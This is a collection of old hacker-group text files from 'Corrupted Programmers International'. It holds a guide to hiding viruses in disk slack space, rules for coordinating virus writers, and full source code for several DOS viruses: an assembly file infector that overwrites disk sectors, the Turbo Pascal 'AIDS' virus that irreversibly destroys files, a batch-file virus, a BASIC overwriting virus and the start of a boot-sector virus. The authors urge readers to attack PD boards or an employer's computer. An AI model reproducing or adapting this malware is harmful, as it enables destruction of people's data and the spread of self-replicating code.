+This system also doesn't take up any disk space, other than the loader. And the +loader could conceivably be under 16 bytes (damn near undetectable). First of +all, you need to know what programs to infect. Now, everybody knows about using +COMMAND.COM and that's unoriginal anyway, when there are other programs people +run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or +WordPerfect; you get the idea. Better still are dos commands like Format, Link +or even compression utilities. But you get the point. Besides, who's going to +miss 16 bytes, right? Now, the good part: where to put the damn thing. One note +to the programmer: This could get tricky if your virus is over 2k or isn't +written in Assembly, but the size problem is easy enough, it would be a simple +thing to break your virus into parts and have the parts load each other into +the system so that you do eventually get the whole thing. The only problem with +using languages besides assembly is that it's hard to break them up into 2k +segments. If you want to infect floppys, or smaller disks, you'd be best off to +break your file into 512 byte segments, since they're easier to hide. But, hey, +in assembly, you can generate pretty small programs that do alot, tho. Ok, by +now you've probably figured out that we're talking about the part of the disk +called 'the slack'. Every disk that your computer uses is divided up into parts +called sectors, which are (in almost all cases) 512 bytes. But in larger disks, +and even in floppies, keeping track of every single sector would be a complete +bitch. So the sectors are bunched together into groups called 'clusters'. On +floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard +disks, they're typically 4096 bytes, or eight sectors. Now think about it, you +have programs on your hard disk, and what are the odds that they will have +sizes that always end up in increments of 4096? 
If I've lost you, think of it +this way: the file takes up a bunch of clusters, but in the last cluster it +uses, there is usually some 'slack', or space that isn't used by the file. This +space is between where the actual file ends and where the actual cluster ends. +So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard +disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton +program 'FS /S /T' command from your root directory, and subtract the total +size of the files from the total disk space used. That's how much 'slack' space +is on your disk (a hell of alot, even on a floppy). To use the slack, all you +need to do is to find a chunk of slack big enough to fit your virus (or a +segment of your virus) and use direct disk access (INT 13) to put your virus +there. There is one minor problem with this. Any disk write to that cluster +will overwrite the slack with 'garbage' from memory. This is because of the way +DOS manages it's disk I/O and it can't be fixed without alot of hassles. But, +there is a way around even this. And it involves a popular (abeit outdated and +usually ineffectual) form of virus protection called the READ-ONLY flag. This +flag is the greatest friend of this type of virus. Because if the file is not +written to, the last cluster is not written to, and voila! Your virus is safe +from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk +I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set + +because that has the same Read-only effect (even tho I haven't seen it written, +it's true that if the file is designated system, DOS treats it as read-only, +whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM +in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too +lazy to find out myself) or a protected (!) COMMAND.COM file in either type of +DOS would be ideal for this. 
All you have to do is then insert your loader into +some innocent-looking file, and you are in business. All your loader has to do +is read the sector into the highest part of memory, and do a far call to it. +Your virus cann then go about waiting for floppy disks to infect, and place +loaders on any available executable file on the disk. Sound pretty neet? It is! +Anyway, have fun, and be sure to upload your virus, along with a README file on +how it works to CPI Headquarters so we can check it out! And remember: don't +target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if +the Sysop is a leech and you want to shove his balls down his throat. Because +if all the PHP boards go down (especially members of CPI), who the hell can you +go to for all these nifty virus ideas? And besides, it's betraying your own +people, which is uncool even if you are an anarchist. So, target uncool PD +boards, or your boss's computer or whatever, but don't attack your friends. +Other than that, have phun, and phuck it up! + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applicaitons Network (SATAN) + Corrupted Programmers International (CPI) + + +PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). + +Call these boards because the sysops are cool: +Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) +System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader) +The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) +D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) +The Jolly Bardsmen's Pub & Tavern +The Sierra Crib +The Phrozen Phorest +Knight Shadow's Grotto + +And if I forgot your board, sorry, but don't send me E-mail bitching about it! 
+[2.4] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + CPI Virus Standards - Protect yourself and your friends + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + One of the main problems with viruses is that once you set one loose, +it is no longer under your control. I propose to stop this by introducing some +standards of virus writing that will enable them to be deactivated whenever +they enter a 'friendly' (CPI) system. In the long run, even the author of the +virus is not immune to being attacked. The following are what I have termed the +CPI standards for writing viruses. They will allow a virus to easily check any +system they are being run on for a type of 'identity badge'. If it is found, +the virus will not infect the system it is being run on. The other standards +are mostly written around this. 
+ +CPI Standards for writing viruses - + + 1 - The virus will have an 'active period' and an 'inactive period'. + The active periods will be no more than one year in length (to make + it more difficult to discover the virus). You may release different + versions of your virus with different 'active periods'. It is not + recommended that your virus deactivate itself after the set active + period, as this would enable people to deactivate viruses by using + their computer with the date set to 2069 or something. It is also + required that activation periods begin on January 1 and end on + December 31. This will coincide with the changing identity codes. + + 2 - The virus will check for an identity code by executing Interrrupt + 12h with the following register settings: AX - 4350, BX - 4920, + CX - AB46, DX - 554E. If the system is friendly, then a pointer + will be returned in CX:DX to an ASCIIZ (0-terminated) string which + will have different contents in different years. The codes are not + to be included in any text file, and should only be given through + E-mail on CPI affiliated systems. You can always ask me by sending + me mail at The Andromeda Strain BBS. If a system is detected as + friendly, the virus will not attempt to infect or damage it, but it + is ok to display a little greeting message about how lucky the + user was. + + 3 - We very much encourage you to upload your virus, along with a breif + description on the workings into the CPI section at The Andromeda + Strain BBS. Only CPI members will know about your virus. This is + so that CPI members can share techniques and it also allows us to + verify that the identity check works. If we see any improvements + that could be made, such as ways to streamline code, better ways of + spreading, etc. we will inform you so that you can make the changes + if you wish. + + 4 - It is also suggested that you use ADS standard for virus storage on + infected disks. 
This meathod uses disk slack space for storage and + is more thoroughly described in a previous text file by me. I think + that this is the most effective and invisible way to store viruli. + + 5 - A list of CPI-Standard viruli will be avaliable at all times from + The Andromeda Strain BBS, to CPI users. Identity strings will also + be available to anyone in CPI, or anyone who uploads source code to + a virus which is 100% complete except for the Identity string (it + must be written to CPI-Standards). Non-CPI members who do this will + be more seriously considered for membership in CPI. + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applications Network (SATAN) + Corrupted Programmers International (CPI) + +PS: This file (by itself) has approx 2.5k of slack. +;[2.5] +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO +; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. 
+; +; DOCTOR DISSECTOR +; CPI INNER CIRCLE +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program + INT 21 ;| to large to fit in memory" when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete "infection" of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. 
+ DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. (get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W"\" ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. 
+ MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOP's) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. + POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. 
The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB "*.COM",00 ;| (search for com files) +MASKE_DIR DB "*",00 ;| (search for dir's) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,"????????EXE",0,0,0,0 + DB 0,"????????COM",0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,"???????????",0,0,0,0 + DB 0,"????????COM",0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB "\",0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB "\" +OLD_PATH DB 32 DUP (?) 
;| (old path) +[2.6] + +-------------------------------+ +--------------------------------------+ + | | P | | + | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | + | @@ @@ @@ @@ | R | # # # # # # | + | @@ @@ @@ @@ | * | ##### # # # ##### | + | @@ @@@@@@@@ @@ | E | # # # # # # | + | @@ @@ @@ | * | # # ##### #### ##### | + | @@ @@ @@ | S | | + | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ + | | E | A NEW AND IMPROVED VIRUS FOR | + +-------------------------------+ * | PC/MS DOS MACHINES | + | C O R R U P T E D | N +--------------------------------------+ + | | * | CREATED BY: DOCTOR DISSECTOR | + | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| + | | * | AUTHOR NOT RESPONSIBLE FOR READERS | + | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| + +-------------------------------+ +--------------------------------------+ + + Well well, here it is... I call it AIDS... It infects all COM files, but it is + not perfect, so it will also change the date/time stamp to the current system. + Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! + + Anyway, this virus was originally named NUMBER ONE, and I modified the code so + that it would fit my needs. The source code, which is included with this neato + package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works. + + Well, I added a few things, you can experiment or mess around with it if you'd + like to, and add any mods to it that you want, but change the name and give us + some credit if you do. + + The file is approximately 13k long, and this extra memory will be added to the + file it picks as host. If no more COM files are to be found, it picks a random + value from 1-10, and if it happens to be the lucky number 7, AIDS will present + a nice screen with lots of smiles, with a note telling the operator that their + system is now screwed, I mean permanantly. 
The files encrypted containing AIDS + in their code are IRREVERSIBLY messed up. Oh well... + + Again, neither CPI nor the author of Number One or AIDS endorses this document + and program for use in any illegal manner. Also, CPI, the author to Number One + and AIDS is not responsible for any actions by the readers that may prove harm + in any way or another. This package was written for EDUCATIONAL purposes only! + +{ Beginning of source code, Turbo Pascal 3.01a } +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDS's code size } + + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) <> UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define 
search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln(' '); {Give a lot of smiles} +Writeln(''); +Writeln(' '); +Writeln('  ATTENTION: '); +Writeln('  I have been elected to inform you that throughout your process of '); +Writeln('  collecting and executing files, you have accidentally HK '); +Writeln('  yourself over; again, that''s PHUCKED yourself over. No, it cannot '); +Writeln('  be; YES, it CAN be, a s has infected your system. Now what do '); +Writeln('  you have to say about that? HAHAHAHA. 
Have H with this one and '); +Writeln('  remember, there is NO cure for '); +Writeln('  '); +Writeln('  '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  '); +Writeln('  '); +Writeln(' '); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } +[2.7] + + Batch Viruses + ------------- + + +Whoever thought that viruses could be in BATCH file.This virus which we + +are about to see makes use of MS-DOS operating system. This BATCH virus +uses DEBUG & EDLIN programs. + +Name: VR.BAT + +echo = off ( Self explanatory) +ctty nul ( This is important. Console output is turned off) +path c:\msdos ( May differ on other systems ) +dir *.com/w>ind ( The directory is written on "ind" ONLY name entries) + +edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear) +debug ind<2 ( New batch program is created with debug) +edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) +ctty con ( Console interface is again assigned) +name ( Newly created NAME.BAT is called. 
+ + +In addition to file to this Batch file,there command files,here named 1,2,3 + +Here is the first command file: +------------------------------- +Name: 1 + +1,4d ( Here line 1-4 of the "IND" file are deleted ) +e ( Save file ) + +Here is the second command file: +-------------------------------- +Name: 2 + +m100,10b,f000 (First program name is moved to the F000H address to save) + +e108 ".BAT" (Extention of file name is changed to .BAT) +m100,10b,f010 (File is saved again) +e100"DEL " (DEL command is written to address 100H) +mf000,f00b,104 (Original file is written after this command) +e10c 2e (Period is placed in from of extension) +e110 0d,0a (Carrige return+ line feed) +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) +e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) +e12b od,0a (COPY command terminated with carriage return + lf) +rxc ( The CX register is ... ) +2c ( set to 2CH) +nname.bat ( Name it NAME.BAT) +w ( Write ) +q ( quit ) + + +The third command file must be printed as a hex dump because it contains +2 control characters (1Ah=Control Z) and this is not entirely printable. + +Hex dump of the third command file: +----------------------------------- +Name: 3 + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + 1 , 1 ? . . n y y y y y y y +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + y . 2 , ? ? r . . n n y y y +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + y y y y . E . . . . . . . . . + + +In order for this virus to work VR.BAT should be in the root. This program +only affects .COM files. +[2.8] + + Viruses in Basic + ---------------- + + +Basic is great language and often people think of it as a limited language +and will not be of any use in creating something like a virus. Well you are +really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. 
+This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE +files.To do this you must compile the source code using a the Microsoft +Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit +the source code to place the lenght of the object program in the LENGHTVIR +variable. BV3.EXE should be in the current directory, COMMAND.COM must be +available, the LENGHTVIR variable must be set to the lenght of the linked + +program and remember to use /e parameter when compiling. + + + +10 REM ** DEMO +20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** +30 REM ** BASIC DOESNT SUCK +40 REM ** NO KIDDING +50 ON ERROR GOTO 670 +60 REM *** LENGHTVIR MUST BE SET ** +70 REM *** TO THE LENGHT TO THE ** +80 REM *** LINKED PROGRAM *** +90 LENGHTVIR=2641 +100 VIRROOT$="BV3.EXE" +110 REM *** WRITE THE DIRECTORY IN THE FILE "INH" +130 SHELL "DIR *.EXE>INH" +140 REM ** OPEN "INH" FILE AND READ NAMES ** +150 OPEN "R",1,"INH",32000 +160 GET #1,1 +170 LINE INPUT#1,ORIGINAL$ +180 LINE INPUT#1,ORIGINAL$ +190 LINE INPUT#1,ORIGINAL$ +200 LINE INPUT#1,ORIGINAL$ +210 ON ERROR GOT 670 +220 CLOSE#2 +230 F=1:LINE INPUT#1,ORIGINAL$ +240 REM ** "%" IS THE MARKER OF THE BV3 +250 REM ** "%" IN THE NAME MEANS +260 REM ** INFECTED COPY PRESENT +270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210 +280 ORIGINAL$=MID$(ORIGINAL$,1,13) +290 EXTENSIONS$=MID$(ORIGINAL,9,13) +300 MID$(EXTENSIONS$,1,1)="." +310 REM *** CONCATENATE NAMES INTO FILENAMES ** +320 F=F+1 +330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN +GOTO 350 +340 GOTO 320 +350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ +360 ON ERROR GOTO 210 +365 TEST$="" +370 REM ++ OPEN FILE FOUND +++ +380 OPEN "R",2,OROGINAL$,LENGHTVIR +390 IF LOF(2) < LENGHTVIR THEN GOTO 420 +400 GET #2,2 +410 LINE INPUT#1,TEST$ +420 CLOSE#2 +431 REM ++ CHECK IF PROGRAM IS ILL ++ +440 REM ++ "%" AT THE END OF THE FILE MEANS.. 
+450 REM ++ FILE IS ALREADY SICK ++ +460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210 +470 CLOSE#1 +480 ORIGINALS$=ORIGINAL$ +490 MID$(ORIGINALS$,1,1)="%" +499 REM ++++ SANE "HEALTHY" PROGRAM ++++ +510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$ +520 SHELL C$ +530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** +540 C$="COPY "+VIRROOT$+ORIGINAL$ +550 SHELL C$ +560 REM *** APPEND VIRUS MARKER *** +570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 +580 WRITE#1,ORIGINALS$ +590 CLOSE#1 +630 REM ++ OUYPUT MESSAGE ++ +640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!" +650 SYSTEM +660 REM ** VIRUS ERROR MESSAGE +670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM +680 END + + +This basic virus will only attack .EXE files. After the execution you will +see a "INH" file which contains the directory, and the file %SORT.EXE. +Programs which start with "%" are NOT infected ,they pose as back up copies. +;[2.9] +;-----------------------------------------------------------------------; +; This virus is of the "FLOPPY ONLY" variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. 
; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. 
